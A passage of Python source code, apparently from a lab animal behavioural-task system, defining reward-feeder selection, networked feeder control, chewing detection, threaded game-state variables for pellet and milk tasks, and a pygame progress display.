        if not (activeMfeeders is None):
            self.activeMfeeders = activeMfeeders
        if not (next_feeder_method is None):
            self.next_feeder_method = next_feeder_method
        if not (repetitions is None):
            self.repetitions = repetitions
        if self.next_feeder_method == 'cycle':
            self._initialize_sequence()
            self.next()
    @staticmethod
    def choose_with_weighted_randomness(activeMfeeders, game_counters):
        """
        Chooses feeder from list with weighted randomness that is based on
        performance in the task. Feeders where there have been
        fewer successful trials are more likely to be chosen.

        Returns the index into activeMfeeders of the chosen feeder.
        """
        # Find number of successful trials for each feeder
        n_successful_trials = []
        for ID in activeMfeeders:
            idx = game_counters['Successful']['ID'].index(ID)
            n_successful_trials.append(game_counters['Successful']['count'][idx])
        n_successful_trials = np.array(n_successful_trials, dtype=np.float64)
        # Choose feeder with weighted randomness if any trial has been successful
        if np.any(n_successful_trials > 0):
            feederProbabilityWeights = np.sum(n_successful_trials) - n_successful_trials
            feederProbability = feederProbabilityWeights / np.sum(feederProbabilityWeights)
            n_feeder = np.random.choice(len(activeMfeeders), p=feederProbability)
        else:
            # If no trial has been successful, pick feeder randomly
            n_feeder = np.random.choice(len(activeMfeeders))
        # BUGFIX: the chosen index was computed but never returned, so the
        # caller (next()) always received None and crashed indexing activeMfeeders.
        return n_feeder
    @staticmethod
    def choose_randomly(activeMfeeders):
        """Return a uniformly random index into activeMfeeders."""
        return np.random.choice(len(activeMfeeders))
    def check_if_first_repetition(self):
        # NOTE(review): repetition_counter only exists after _initialize_sequence
        # (the 'cycle' method); with other methods and repetitions > 0 this
        # would raise AttributeError — confirm callers only use it with 'cycle'.
        if self.repetitions > 0:
            return self.repetition_counter == 0
        else:
            return True
    def copy_ID(self):
        """Return a copy of the current goal feeder ID."""
        return copy(self.ID)
    def next(self, game_counters=None):
        """
        Selects the next feeder chosen from the activeMfeeders list elements,
        using the choice method provided during initialization.
        game_counters - dict with specific structure (see choose_with_weighted_randomness() method)
                        only required for weighted random choice.
        """
        if self.next_feeder_method == 'random':
            n_feeder = MilkGoal.choose_randomly(self.activeMfeeders)
        elif self.next_feeder_method == 'weighted':
            if game_counters is None:
                raise Exception('game_counters input required for weigthed randomness ' \
                                + 'in next MilkGoal decision.')
            n_feeder = MilkGoal.choose_with_weighted_randomness(self.activeMfeeders,
                                                                game_counters)
        elif self.next_feeder_method == 'cycle':
            self.repetition_counter += 1
            if self.repetition_counter > self.repetitions:
                # If counter has maxed out, move up in sequence position and reset counter
                self.sequence_position = np.mod(self.sequence_position + 1, len(self.sequence))
                self.repetition_counter = 0
            n_feeder = self.sequence[self.sequence_position]
        # Set current ID of milk goal
        self.ID = self.activeMfeeders[n_feeder]
class RewardDevices(object):
    """
    Manages a collection of networked reward feeder devices of one type.

    Feeders are initialized concurrently over the network in separate
    threads; a per-feeder Lock guards access to each feeder's entry in
    the FEEDERs dict because those threads mutate it.
    """
    def __init__ (self, FEEDERs, feeder_type, username, password,
                  feeder_kwargs={}, inactivation_signal=None):
        """
        FEEDERs - dict - key (ID) and value (feeder specific parameters)
        feeder_type - str - passed on to RPiInterface.RewardControl
        username - str - username for all the Raspberry Pis in FEEDERs dict
        password - str - password for all the Raspberry Pis in FEEDERs dict
        feeder_kwargs - dict - key (ID) and value (feeder specific kwargs to be
                        passed to RPiInterfaces.RewardControl)
        inactivation_signal - this method is called with feeder_type and ID as argument
                              when a feeder is being inactivated.
        """
        # Parse input arguments
        # NOTE(review): feeder_kwargs={} is a mutable default argument; it is
        # only read here, never mutated, so behavior is safe but unidiomatic.
        self.FEEDERs = FEEDERs
        self.feeder_type = feeder_type
        self.username = username
        self.password = password
        self.FEEDER_kwargs = feeder_kwargs
        self._inactivation_signal = inactivation_signal
        # Create Locks for all feeders
        self.FEEDERs_Locks = {}
        for ID in self.FEEDERs.keys():
            self.FEEDERs_Locks[ID] = Lock()
        # Create a list of feeders present
        self.IDs_present = []
        for ID in self.FEEDERs.keys():
            if self.FEEDERs[ID]['Present']:
                self.IDs_present.append(ID)
        self.IDs_present = sorted(self.IDs_present, key=int)
        # Create dictionary of feeder positions
        self.positions = {}
        for ID in self.FEEDERs.keys():
            self.positions[ID] = copy(self.FEEDERs[ID]['Position'])
        # Initialize all feeders concurrently.
        # Inactive feeders are also initialized if they are configured to play
        # a negative audio signal (they must be reachable to play it).
        T_initFEEDER = []
        for ID in self.FEEDERs.keys():
            if (self.FEEDERs[ID]['Active']
                or (ID in feeder_kwargs
                    and 'negativeAudioSignal' in feeder_kwargs[ID]
                    and feeder_kwargs[ID]['negativeAudioSignal'] > 0)):
                T = Thread(target=self._initFEEDER, args=(ID,))
                T.start()
                T_initFEEDER.append(T)
        for T in T_initFEEDER:
            T.join()
        # Create a list of active feeder IDs
        # (only feeders that are both Active and successfully initialized)
        self.IDs_active = []
        for ID in self.FEEDERs.keys():
            if self.FEEDERs[ID]['Active'] and self.FEEDERs[ID]['init_successful']:
                self.IDs_active.append(ID)
        self.IDs_active = sorted(self.IDs_active, key=int)
    def _initFEEDER(self, ID):
        """
        Connects to the feeder's device and stores the actuator in
        FEEDERs[ID]['actuator'], setting FEEDERs[ID]['init_successful']
        accordingly. Intended to run in its own thread per feeder.
        """
        with self.FEEDERs_Locks[ID]:
            IP = self.FEEDERs[ID]['IP']
        try:
            kwargs = self.FEEDER_kwargs[ID] if ID in self.FEEDER_kwargs.keys() else {}
            actuator = RewardControl(self.feeder_type, IP, self.username,
                                     self.password, **kwargs)
            with self.FEEDERs_Locks[ID]:
                self.FEEDERs[ID]['actuator'] = actuator
                self.FEEDERs[ID]['init_successful'] = True
        except Exception as e:
            # Report where the failure happened and mark the feeder as failed
            from inspect import currentframe, getframeinfo
            frameinfo = getframeinfo(currentframe())
            print('Error in ' + frameinfo.filename + ' line ' + str(frameinfo.lineno - 3))
            print('initFEEDER failed for: ' + IP)
            print(e)
            with self.FEEDERs_Locks[ID]:
                self.FEEDERs[ID]['init_successful'] = False
    def actuator_method_call(self, ID, method_name, *args, **kwargs):
        """
        ID - str - identifies which feeder to use
        method_name - str - name of the method to call
        Method will be called with any following args and kwargs
        """
        with self.FEEDERs_Locks[ID]:
            if 'actuator' in self.FEEDERs[ID].keys():
                return getattr(self.FEEDERs[ID]['actuator'], method_name)(*args, **kwargs)
            else:
                warnings.warn('FEEDER ' + str(ID) + ' does not have an active acutator.')
    def inactivate_feeder(self, ID):
        """
        Removes feeder ID from the active list, notifies via the
        inactivation_signal callback (if provided) and closes its actuator.
        """
        # Remove feeder from active feeder list
        self.IDs_active.remove(ID)
        # Invoke the deactivation signal if provided during initialization
        if not (self._inactivation_signal is None):
            self._inactivation_signal(self.feeder_type, ID)
        # Close actuator for this feeder
        with self.FEEDERs_Locks[ID]:
            if 'actuator' in self.FEEDERs[ID].keys():
                actuator = self.FEEDERs[ID].pop('actuator')
        if hasattr(actuator, 'close'):
            # Deactivate in a separate thread in case it crashes
            Thread(target=actuator.close).start()
    def close(self):
        """Closes every initialized actuator that supports close()."""
        for ID in self.FEEDERs.keys():
            if 'actuator' in self.FEEDERs[ID].keys():
                if hasattr(self.FEEDERs[ID]['actuator'], 'close'):
                    self.FEEDERs[ID]['actuator'].close()
class ChewingTracker(object):
    """Tracks chewing-detection TTL pulses arriving as text messages."""

    def __init__(self, chewing_ttl_chan):
        # Channel number on which chewing TTL pulses are expected
        self.chewing_ttl_chan = chewing_ttl_chan
        # Timestamps of detected chewing events; guarded by ttlTimesLock
        self.ttlTimes = np.array([], dtype=np.float64)
        self.ttlTimesLock = Lock()

    def check_for_chewing_message(self, message):
        """Record current time if message reports a rising TTL edge on the chewing channel."""
        fields = message.split()
        if fields[2] == str(self.chewing_ttl_chan):
            if fields[3] == str(1):
                with self.ttlTimesLock:
                    self.ttlTimes = np.append(self.ttlTimes, time())

    def number_of_chewings(self, time_from):
        """Return how many chewing events occurred after time_from."""
        with self.ttlTimesLock:
            snapshot = copy(self.ttlTimes)
        return np.sum(snapshot > time_from)
class Abstract_Variables(object):
    """
    Base class for continuously recomputed game variable states.

    Subclasses implement _recompute_dynamic_variables(), which is called
    once during __init__ and then repeatedly from a background thread at
    VARIABLE_UPDATE_RATE Hz.

    If self._variable_state_update_pending is set True, get() and get_all()
    methods only return after a new update has taken place.
    """
    def __init__(self):
        """
        Can be reimplemented but must be called as well with super.
        """
        # Create variable states
        self._variable_states = []
        self._variable_state_names = []
        self._variable_states_Lock = Lock()
        self._variable_state_update_pending = True
        # Compute variable states for first time
        self._recompute_dynamic_variables()
        # Create a list of relevance time markers
        # (one timestamp per variable; see _set_relevant / get_all_relevance)
        self._last_relevance = [time()] * len(self._variable_state_names)
        # Start updating loop in the background
        VARIABLE_UPDATE_RATE = 10
        self._start_updating(VARIABLE_UPDATE_RATE)
    def _update_variable_states(self, variable_states, variable_state_names):
        # Atomically publish the new states and clear the pending flag,
        # unblocking any get()/get_all() callers waiting on a fresh update.
        # Update variable states
        with self._variable_states_Lock:
            self._variable_states = variable_states
            self._variable_state_names = variable_state_names
        # Mark that no update is pending
        self._variable_state_update_pending = False
    def _wait_until_pending_update_complete(self):
        # Poll (with short sleeps) until _recompute_dynamic_variables has
        # published states computed after the last parameter change.
        while self._variable_state_update_pending:
            sleep(0.005)
    def _recompute_dynamic_variables(self):
        """
        Must be re-implemented.
        This method must finish by calling self._update_variable_states method.
        This method is called iteratively to keep track of dynamic variables.
        """
        raise NotImplementedError
        # NOTE: unreachable; illustrates the required final call in subclasses.
        self._update_variable_states(variable_states, variable_state_names)
    def _update_loop(self, update_rate):
        # Background loop driving _recompute_dynamic_variables at update_rate Hz.
        loop_clock = pygame.time.Clock()
        while self._loop_active:
            self._recompute_dynamic_variables()
            loop_duration = loop_clock.tick(update_rate)
            if loop_duration > (25 + 1000 / update_rate):
                warnings.warn('Method _recompute_dynamic_variables in ' + str(type(self)) + \
                              ' runs slower than assigned ' + \
                              'update rate ' + str(update_rate) + ' Hz. Duration ' + \
                              str(loop_duration) + ' ms.', RuntimeWarning)
    def _start_updating(self, update_rate):
        # Launch the background update loop thread.
        self._loop_active = True
        self._T_loop = Thread(target=self._update_loop,
                              args=(update_rate,))
        self._T_loop.start()
    def _stop_updating(self):
        # Stop and join the background update loop thread.
        self._loop_active = False
        self._T_loop.join()
    def get(self, name, key, set_relevant=False):
        """
        Returns a copy of a single field (key) of the variable state called
        name, or None if no such variable exists. If set_relevant is True,
        marks the variable as recently queried (see get_all_relevance).
        """
        self._wait_until_pending_update_complete()
        if name in self._variable_state_names:
            if set_relevant:
                self._set_relevant(name)
            with self._variable_states_Lock:
                return copy(self._variable_states[self._variable_state_names.index(name)][key])
        else:
            return None
    def get_all(self):
        """Returns a copy of the full list of variable state dicts."""
        self._wait_until_pending_update_complete()
        with self._variable_states_Lock:
            return copy(self._variable_states)
    def get_all_relevance(self):
        """
        Returns list of time in seconds for each variable in _variable_states list
        since this was last set as relevant.
        """
        return [time() - rel for rel in self._last_relevance]
    def _set_relevant(self, name):
        # Record the time this variable was last queried as relevant.
        self._last_relevance[self._variable_state_names.index(name)] = time()
    def close(self):
        """Stops the background update loop."""
        self._stop_updating()
class GenericGame_Variables(Abstract_Variables):
    """
    Dynamic variables common to all games: currently only the animal's
    recent mobility (distance travelled over the last position samples).
    """
    def __init__(self, TaskSettings, processed_position_list):
        # Parse inputs
        self.processed_position_list = processed_position_list
        # Parse TaskSettings
        self._distance_steps = TaskSettings['distance_steps']
        self._last_travel_smoothing = TaskSettings['LastTravelSmooth']
        self._last_travel_min_dist = TaskSettings['LastTravelDist']
        # Initialize position data for use in computing variable states
        self._initialize_position_data_for_update_variable_states()
        # Proceed with original __init__ method (starts the update loop)
        super(GenericGame_Variables, self).__init__()
    def _initialize_position_data_for_update_variable_states(self):
        """
        Blocks until self._distance_steps valid (non-None) position samples
        are available, then stores the latest sample as last known position.
        """
        posHistory = [None]
        while None in posHistory:
            if len(self.processed_position_list) > self._distance_steps:
                posHistory = copy(self.processed_position_list[-self._distance_steps:])
            else:
                posHistory = [None]
            if not (None in posHistory):
                # BUGFIX: store only the latest sample, not the whole list.
                # _recompute_dynamic_variables treats _lastKnownPosHistory as a
                # single sample (substituting [sample] * n_steps when data is
                # missing), so storing the full list here produced a wrongly
                # nested history on a first recompute with missing data.
                self._lastKnownPosHistory = posHistory[-1]
            else:
                sleep(0.01)
    def _recompute_dynamic_variables(self):
        """Recompute the mobility variable and publish the new state."""
        # Get animal position history
        posHistory = self.processed_position_list[-self._distance_steps:]
        if not (None in posHistory):
            self._lastKnownPosHistory = posHistory[-1]
        else:
            # Position data is faulty; hold the animal at its last known position
            posHistory = [self._lastKnownPosHistory] * self._distance_steps
        # Compute all game progress variables
        variable_states = []
        variable_state_names = []
        # Check if the animal has been moving enough in the last few seconds
        variable_state_names.append('mobility')
        total_distance = compute_distance_travelled(posHistory, self._last_travel_smoothing)
        variable_states.append({'name': 'Mobility',
                                'target': self._last_travel_min_dist,
                                'status': int(round(total_distance)),
                                'complete': total_distance >= self._last_travel_min_dist,
                                'percentage': total_distance / float(self._last_travel_min_dist)})
        # Update variable states
        self._update_variable_states(variable_states, variable_state_names)
class PelletGame_Variables(Abstract_Variables):
    """
    Dynamic variables for the pellet game: inactivity duration, chewing
    progress and time since the last pellet reward (with a jittered
    minimum separation between rewards).
    """
    def __init__(self, TaskSettings, ChewingTracker):
        # Parse inputs
        self._ChewingTracker = ChewingTracker
        # Parse TaskSettings
        self._distance_steps = TaskSettings['distance_steps']
        self._one_second_steps = TaskSettings['one_second_steps']
        self._chewing_target = TaskSettings['Chewing_Target']
        self._reward_min_separation_mean = TaskSettings['PelletRewardMinSeparationMean']
        self._reward_min_separation_variance = TaskSettings['PelletRewardMinSeparationVariance']
        self._max_inactivity_duration = TaskSettings['MaxInactivityDuration']
        # Start reward timers
        self._last_reward = time()
        self.update_reward_min_separation()
        # Proceed with base class initialization (starts the update loop)
        super(PelletGame_Variables, self).__init__()
    def update_reward_min_separation(self):
        """Draw a new jittered minimum separation between pellet rewards."""
        mean_separation = self._reward_min_separation_mean
        variance = self._reward_min_separation_variance
        low = int(-mean_separation * variance)
        high = int(mean_separation * variance)
        self._reward_min_separation = int(mean_separation + random.randint(low, high))
        # Ensure variables are updated using this new value before they are observed
        self._variable_state_update_pending = True
    def update_last_reward(self):
        """Reset the last-reward timer to now."""
        self._last_reward = time()
        # Ensure variables are updated using this new value before they are observed
        self._variable_state_update_pending = True
    def _recompute_dynamic_variables(self):
        """Recompute pellet-game progress variables and publish them."""
        names = []
        states = []
        # Time without a pellet reward; when complete, a reward is forced
        elapsed_since_reward = time() - self._last_reward
        names.append('inactivity')
        states.append({'name': 'Inactivity',
                       'target': self._max_inactivity_duration,
                       'status': int(round(elapsed_since_reward)),
                       'complete': elapsed_since_reward >= self._max_inactivity_duration,
                       'percentage': elapsed_since_reward / float(self._max_inactivity_duration)})
        # Chewing progress since last reward (always complete when target is 0)
        names.append('chewing')
        if self._chewing_target > 0:
            chew_count = self._ChewingTracker.number_of_chewings(self._last_reward)
            states.append({'name': 'Chewing',
                           'target': self._chewing_target,
                           'status': chew_count,
                           'complete': chew_count >= self._chewing_target,
                           'percentage': chew_count / float(self._chewing_target)})
        else:
            states.append({'name': 'Chewing',
                           'target': self._chewing_target,
                           'status': 0,
                           'complete': True,
                           'percentage': 0})
        # Minimum (jittered) separation between successive pellet rewards
        elapsed_since_pellet = time() - self._last_reward
        names.append('time_since_last_pellet')
        states.append({'name': 'Since Pellet',
                       'target': self._reward_min_separation,
                       'status': int(round(elapsed_since_pellet)),
                       'complete': elapsed_since_pellet >= self._reward_min_separation,
                       'percentage': elapsed_since_pellet / float(self._reward_min_separation)})
        # Publish the newly computed states
        self._update_variable_states(states, names)
class MilkGame_Variables(Abstract_Variables):
    """
    Dynamic variables for the milk task: trial timing, distances and
    angular distance of the animal relative to milk feeders and the
    current goal feeder.
    """
    def __init__(self, TaskSettings, processed_position_list, MilkRewardDevices, MilkGoal):
        # Parse inputs
        self.processed_position_list = processed_position_list
        self._MilkRewardDevices = MilkRewardDevices
        self._MilkGoal = MilkGoal
        # Parse TaskSettings
        self._distance_steps = TaskSettings['distance_steps']
        self._one_second_steps = TaskSettings['one_second_steps']
        self._angular_distance_steps = TaskSettings['angular_distance_steps']
        self._max_distance_in_arena = TaskSettings['max_distance_in_arena']
        self._min_trial_separation_mean = TaskSettings['MilkTrialMinSeparationMean']
        self._min_trial_separation_variance = TaskSettings['MilkTrialMinSeparationVariance']
        self._min_start_distance = TaskSettings['MilkTaskMinStartDistance']
        self._min_angular_distance = TaskSettings['MilkTaskMinGoalAngularDistance']
        self._min_goal_distance = TaskSettings['MilkTaskMinGoalDistance']
        self._max_trial_duration = TaskSettings['MilkTrialMaxDuration']
        # Create timers
        self._last_trial = time()
        self.update_min_trial_separation()
        # Initialize position data for use in computing variable states
        self._initialize_position_data_for_update_variable_states()
        # Proceed with original __init__ method (starts the update loop)
        super(MilkGame_Variables, self).__init__()
    def _initialize_position_data_for_update_variable_states(self):
        """
        Blocks until self._distance_steps valid (non-None) position samples
        are available, then stores the latest sample as last known position.
        """
        posHistory = [None]
        while None in posHistory:
            if len(self.processed_position_list) > self._distance_steps:
                posHistory = copy(self.processed_position_list[-self._distance_steps:])
            else:
                posHistory = [None]
            if not (None in posHistory):
                # BUGFIX: store only the latest sample, not the whole list.
                # _recompute_dynamic_variables treats _lastKnownPosHistory as a
                # single sample (substituting [sample] * n_steps when data is
                # missing), so storing the full list here produced a wrongly
                # nested history on a first recompute with missing data.
                self._lastKnownPosHistory = posHistory[-1]
            else:
                sleep(0.01)
    def _update_feeder_distances(self, posHistory_one_second_steps):
        """Recompute distances from mean recent position to every present feeder."""
        mean_posHistory = compute_mean_posHistory(posHistory_one_second_steps)
        distances = []
        for ID in self._MilkRewardDevices.IDs_present:
            distances.append(euclidean(mean_posHistory, self._MilkRewardDevices.positions[ID]))
        self._feeder_distances = distances
    def closest_feeder_ID(self):
        """Return the ID of the feeder currently closest to the animal."""
        return self._MilkRewardDevices.IDs_present[np.argmin(self._feeder_distances)]
    def update_min_trial_separation(self):
        """Draw a new jittered minimum separation between milk trials."""
        mean_val = self._min_trial_separation_mean
        var_val = self._min_trial_separation_variance
        jitter = [int(- mean_val * var_val), int(mean_val * var_val)]
        jitter = random.randint(jitter[0], jitter[1])
        new_val = int(mean_val + jitter)
        self._min_trial_separation = new_val
        # Ensure variables are updated using this new value before they are observed
        self._variable_state_update_pending = True
    def update_last_trial(self):
        """Reset the last-trial timer to now."""
        self._last_trial = time()
        # Ensure variables are updated using this new value before they are observed
        self._variable_state_update_pending = True
    def _recompute_dynamic_variables(self):
        """Recompute all milk-game progress variables and publish them."""
        # Get animal position history
        max_len = max([self._distance_steps, self._one_second_steps, self._angular_distance_steps])
        posHistory_max_length = self.processed_position_list[-max_len:]
        posHistory = posHistory_max_length[-self._distance_steps:]
        posHistory_one_second_steps = posHistory_max_length[-self._one_second_steps:]
        posHistory_for_angularDistance = posHistory_max_length[-self._angular_distance_steps:]
        # If animal position history is faulty, use last known position as current static position
        if None in posHistory or None in posHistory_one_second_steps or None in posHistory_for_angularDistance:
            posHistory_one_second_steps = [self._lastKnownPosHistory] * self._one_second_steps
            posHistory_for_angularDistance = [self._lastKnownPosHistory] * self._angular_distance_steps
        else:
            self._lastKnownPosHistory = posHistory[-1]
        # Compute distances to all active milk feeders
        self._update_feeder_distances(posHistory_one_second_steps)
        # Compute all game progress variables
        variable_states = []
        variable_state_names = []
        # Check if enough time has passed since last milk trial
        variable_state_names.append('time_since_last_milk_trial')
        timeSinceLastMilkTrial = time() - self._last_trial
        variable_states.append({'name': 'Since Trial',
                                'target': self._min_trial_separation,
                                'status': int(round(timeSinceLastMilkTrial)),
                                'complete': timeSinceLastMilkTrial >= self._min_trial_separation,
                                'percentage': timeSinceLastMilkTrial / float(self._min_trial_separation)})
        # Check if animal is far enough from milk rewards
        variable_state_names.append('distance_from_milk_feeders')
        minDistance = min(self._feeder_distances)
        variable_states.append({'name': 'Milk Distance',
                                'target': self._min_start_distance,
                                'status': int(round(minDistance)),
                                'complete': minDistance >= self._min_start_distance,
                                'percentage': minDistance / float(self._min_start_distance)})
        # Check if animal is not moving towards the goal location
        variable_state_names.append('angular_distance_from_goal_feeder')
        target_location = self._MilkRewardDevices.positions[self._MilkGoal.copy_ID()]
        angularDistance = compute_movement_angular_distance_to_target(posHistory_for_angularDistance,
                                                                      target_location)
        if angularDistance is None:
            # Angular distance is undefined (e.g. animal not moving); treat as 0
            angularDistance = 0
        variable_states.append({'name': 'Milk A.Distance',
                                'target': self._min_angular_distance,
                                'status': int(round(angularDistance)),
                                'complete': angularDistance >= self._min_angular_distance,
                                'percentage': angularDistance / float(self._min_angular_distance)})
        # Check if animal is close enough to goal location
        variable_state_names.append('distance_from_goal_feeder')
        if self._MilkGoal.copy_ID() in self._MilkRewardDevices.IDs_active:
            # This may not be the case if the goal milk feeder has just been deactivated
            goal_distance = self._feeder_distances[self._MilkRewardDevices.IDs_present.index(self._MilkGoal.copy_ID())]
        else:
            goal_distance = self._max_distance_in_arena
        variable_states.append({'name': 'Goal Distance',
                                'target': self._min_goal_distance,
                                'status': int(round(goal_distance)),
                                'complete': goal_distance <= self._min_goal_distance,
                                'percentage': 1 - (goal_distance - self._min_goal_distance) / float(self._max_distance_in_arena)})
        # Check if animal is too close to an incorrect (non-goal) location
        if len(self._MilkRewardDevices.IDs_present) > 1:
            variable_state_names.append('distance_from_other_feeders')
            other_distances = min([self._feeder_distances[i] for i in range(len(self._MilkRewardDevices.IDs_present)) if self._MilkRewardDevices.IDs_present[i] != self._MilkGoal.copy_ID()])
            variable_states.append({'name': 'Other Distance',
                                    'target': self._min_goal_distance,
                                    'status': int(round(other_distances)),
                                    'complete': other_distances <= self._min_goal_distance,
                                    'percentage': 1 - (other_distances - self._min_goal_distance) / float(self._max_distance_in_arena)})
        # Check if trial has been running for too long
        variable_state_names.append('milk_trial_duration')
        trial_run_time = time() - self._last_trial
        variable_states.append({'name': 'Trial Duration',
                                'target': self._max_trial_duration,
                                'status': int(round(trial_run_time)),
                                'complete': trial_run_time > self._max_trial_duration,
                                'percentage': trial_run_time / float(self._max_trial_duration)})
        # Update variable states
        self._update_variable_states(variable_states, variable_state_names)
class PositionList(object):
    """
    Keeps a periodically refreshed local snapshot of the shared processed
    position list, updated in a background thread. Supports len(),
    indexing and iteration over the snapshot.
    """
    def __init__(self, processed_position_list, TaskSettings, update_interval):
        self._processed_position_list = processed_position_list
        # Keep one more sample than the longest history any consumer needs
        self.list_len = 1 + max(TaskSettings['distance_steps'],
                                TaskSettings['one_second_steps'],
                                TaskSettings['angular_distance_steps'])
        # Block until the shared list is long enough for a full snapshot
        while len(self._processed_position_list) <= self.list_len:
            sleep(0.1)
        self._position_list = self._processed_position_list[-self.list_len:]
        self.lock = Lock()
        self.updating = True
        self.updating_thread = Thread(target=self.updating_worker, args=(update_interval,))
        self.updating_thread.start()
    def updating_worker(self, update_interval):
        """Refresh the local snapshot roughly every update_interval seconds."""
        last_update = time()
        while self.updating:
            if time() - last_update >= update_interval:
                snapshot = copy(self._processed_position_list[-self.list_len:])
                with self.lock:
                    self._position_list = snapshot
                last_update = time()
            else:
                # Not yet due for a refresh; nap a fraction of the interval
                sleep(update_interval * 0.1)
    @property
    def position_list(self):
        """Thread-safe copy of the current snapshot."""
        with self.lock:
            return copy(self._position_list)
    def __iter__(self):
        return iter(self.position_list)
    def __getitem__(self, key):
        return self.position_list[key]
    def __len__(self):
        return len(self.position_list)
    def close(self):
        """Stop and join the background updating thread."""
        self.updating = False
        self.updating_thread.join()
class Variables(object):
    """
    Aggregates the variable-state instances for all active games and
    exposes combined access to their states and relevance timings.
    """
    def __init__(self, TaskSettings, processed_position_list,
                 ChewingTracker=None, MilkRewardDevices=None, MilkGoal=None,
                 position_update_interval=0.1):
        self._names = []
        self._instances = {}
        # Local, periodically refreshed copy of the shared position list
        self.local_processed_position_list = PositionList(processed_position_list, TaskSettings,
                                                          position_update_interval)
        # Generic variables are always instantiated
        self._register('GenericGame_Variables',
                       GenericGame_Variables(TaskSettings, self.local_processed_position_list))
        # Pellet game variables only if the pellet game is active
        if TaskSettings['games_active']['pellet']:
            self._register('PelletGame_Variables',
                           PelletGame_Variables(TaskSettings, ChewingTracker))
        # Milk game variables only if the milk game is active
        if TaskSettings['games_active']['milk']:
            self._register('MilkGame_Variables',
                           MilkGame_Variables(TaskSettings,
                                              self.local_processed_position_list,
                                              MilkRewardDevices, MilkGoal))
    def _register(self, name, instance):
        """Store an instantiated variables class under its name, keeping order."""
        self._instances[name] = instance
        self._names.append(name)
    def get(self, name):
        """Return the variables instance registered under name."""
        return self._instances[name]
    def full_list(self):
        """Return concatenated variable states from all registered instances."""
        combined = []
        for name in self._names:
            combined.extend(self._instances[name].get_all())
        return combined
    def full_list_relevance(self):
        """Return concatenated relevance timings from all registered instances."""
        combined = []
        for name in self._names:
            combined.extend(self._instances[name].get_all_relevance())
        return combined
    def set_dict(self):
        """Return the mapping from variable class names to instances."""
        return self._instances
    def close(self):
        """Stop the position list updater and all variable update loops."""
        self.local_processed_position_list.close()
        for name in self._names:
            self._instances[name].close()
class VariableDisplay(object):
    """
    Renders progress bars and text labels for all game variable states.
    Bar geometry and colors are pre-computed once in _pre_render; render()
    then draws the current states each frame.
    """
    def __init__(self, position_on_screen, renderText, Variables):
        """
        position_on_screen - dict - ['top', 'bottom', 'left', 'right'] border of the data on screen
        renderText - pygame.font.SysFont.render method for an existing font instance
        Variables - Variables instance
        """
        self._renderText = renderText
        self._Variables = Variables
        self._pre_render(position_on_screen)
    def _get_all_variable_states(self):
        # Returns (variable_states, relevance) lists in matching order.
        return self._Variables.full_list(), self._Variables.full_list_relevance()
    def _pre_render(self, position_on_screen):
        """
        Pre-computes variable state display positions and renders static text
        position_on_screen - dict - ['top', 'bottom', 'left', 'right'] border of the data on screen
            provided to VariableDisplay.render method
        """
        variable_states, _ = self._get_all_variable_states()
        # Initialise random color generation
        # (fixed seed so bar colors are identical across runs; each bar's
        # color depends on the order of rcolor() calls below)
        random.seed(1232)
        rcolor = lambda: random.randint(0,255)
        # Compute progress bar locations
        # Three text lines (name, target, current value) below each bar
        textSpacing = 3
        textSpace = 10 + textSpacing
        textLines = 3
        # Interleave bar slots with equal-width gaps across the display area
        xpos = np.linspace(position_on_screen['left'], position_on_screen['right'], 2 * len(variable_states))
        xlen = xpos[1] - xpos[0]
        xpos = xpos[::2]
        ybottompos = position_on_screen['bottom'] - textSpace * textLines
        ymaxlen = position_on_screen['bottom'] - position_on_screen['top'] - textSpace * textLines
        progress_bars = []
        for i, vs in enumerate(variable_states):
            progress_bars.append({'name_text': self._renderText(vs['name']),
                                  'target_text': '',
                                  'value_text': '',
                                  'name_position': (xpos[i], ybottompos + 1 * textSpace),
                                  'target_position': (xpos[i], ybottompos + 2 * textSpace),
                                  'value_position': (xpos[i], ybottompos + 3 * textSpace),
                                  'color': (rcolor(), rcolor(), rcolor()),
                                  'Position': {'xpos': xpos[i],
                                               'xlen': xlen,
                                               'ybottompos': ybottompos,
                                               'ymaxlen': ymaxlen}})
        # Re-seed from system entropy so later random use is not deterministic
        random.seed(None)
        self.progress_bars = progress_bars
    def render(self, screen, max_relevance_latency=0.2):
        """
        screen - pygame.display.set_mode output
        max_relevance_latency - float - if more seconds since last relevance, colored dark gray
        """
        variable_states, relevance = self._get_all_variable_states()
        for vs, pb, rel in zip(variable_states, self.progress_bars, relevance):
            # Static label plus live target/current value text lines
            screen.blit(pb['name_text'], pb['name_position'])
            screen.blit(self._renderText('T: ' + str(vs['target'])), pb['target_position'])
            screen.blit(self._renderText('C: ' + str(vs['status'])), pb['value_position'])
            if rel < max_relevance_latency:
                color = pb['color'] # This could be turned into a condition to have state dependent color
            else:
                color = (30, 30, 30)
            if vs['complete']:
                # Full-height bar with a white border marks a completed condition
                ylen = int(round(pb['Position']['ymaxlen']))
                ypos = int(round(pb['Position']['ybottompos'] - pb['Position']['ymaxlen']))
                position = (pb['Position']['xpos'], ypos, pb['Position']['xlen'], ylen)
                draw_rect_with_border(screen, color, (255, 255, 255), position, border=2)
            else:
                # Partial bar grows upward in proportion to progress percentage
                ylen = int(round(vs['percentage'] * pb['Position']['ymaxlen']))
                ypos = pb['Position']['ybottompos'] - ylen
                position = (pb['Position']['xpos'], ypos, pb['Position']['xlen'], ylen)
                pygame.draw.rect(screen, color, position, 0)
class GameState(object):
    """
    Base class for task states. Subclasses implement repeat_logic() (and
    optionally pre_logic()); enter() then drives the state until
    repeat_logic returns the next state name and its kwargs.
    """
    def __init__(self, **kwargs):
        """
        Can be re-reimplemented, but must accept **kwargs. These can be used
        further but must not be changed.
        """
    def pre_logic(self, **kwargs):
        """
        Called once, before the repeated repeat_logic() calls, with the same
        input kwargs. Can be re-implemented.
        """
        pass
    def repeat_logic(self, **kwargs):
        """
        Must be re-implemented and must accept **kwargs.
        This method should utilize kwargs provided to __init__ and this method.
        Called repeatedly until it returns a value other than None:
            next_state - str - name of the next state class
            kwargs - dict - at minimum must be an empty dictionary.
                This is passed to the next state class repeat_logic method.
        """
        raise NotImplementedError
    def enter(self, game_rate, **kwargs):
        """
        This should be called immediately after instantiation.
        Blocks, calling repeat_logic() at game_rate Hz until it yields a
        result or exit() is called. Returns (next_state, kwargs), or None
        when interrupted via exit().
        """
        self._continue = True
        # Run the one-off setup before the repeated logic calls
        self.pre_logic(**kwargs)
        outcome = None
        state_clock = pygame.time.Clock()
        while self._continue and outcome is None:
            outcome = self.repeat_logic(**kwargs)
            elapsed = state_clock.tick(game_rate)
            # Warn if a single iteration overran its time budget noticeably
            if elapsed > (25 + 1000 / game_rate):
                warnings.warn('Method repeat_logic in ' + str(type(self)) + \
